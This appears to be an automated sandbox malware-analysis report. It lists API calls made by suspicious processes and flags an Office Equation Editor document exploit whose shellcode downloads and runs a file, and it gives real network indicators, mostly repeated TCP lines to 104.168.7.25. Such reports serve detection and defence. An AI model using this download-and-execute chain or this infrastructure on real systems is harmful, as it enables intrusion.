Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00D5F17E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F449B GetFileAttributesW,FindFirstFileW,FindClose,	6_2_013F449B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FC75D FindFirstFileW,FindClose,	6_2_013FC75D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_013FC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_013FF17E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_013FF021
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_013FF47F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_013F3833
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_013F3B56
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_013FBD48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_0040928E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	7_2_0041C322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	7_2_0040C388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_004096A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	7_2_00408847
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00407877 FindFirstFileW,FindNextFileW,	7_2_00407877
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044E8F9 FindFirstFileExA,	7_2_0044E8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,	7_2_00419B86
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_0040BD72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10006580 FindFirstFileExA,	7_2_10006580

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

7_2_00407CD2

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_00683F21
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683FC6 ShellExecuteW,ExitProcess,	2_2_00683FC6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683F98 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_00683F98
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683EA3 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_00683EA3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683F3B URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_00683F3B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683FEB ExitProcess,	2_2_00683FEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683FB1 ShellExecuteW,ExitProcess,	2_2_00683FB1

Source: global traffic

DNS query: name: geoplugin.net

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 178.237.33.50:80

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
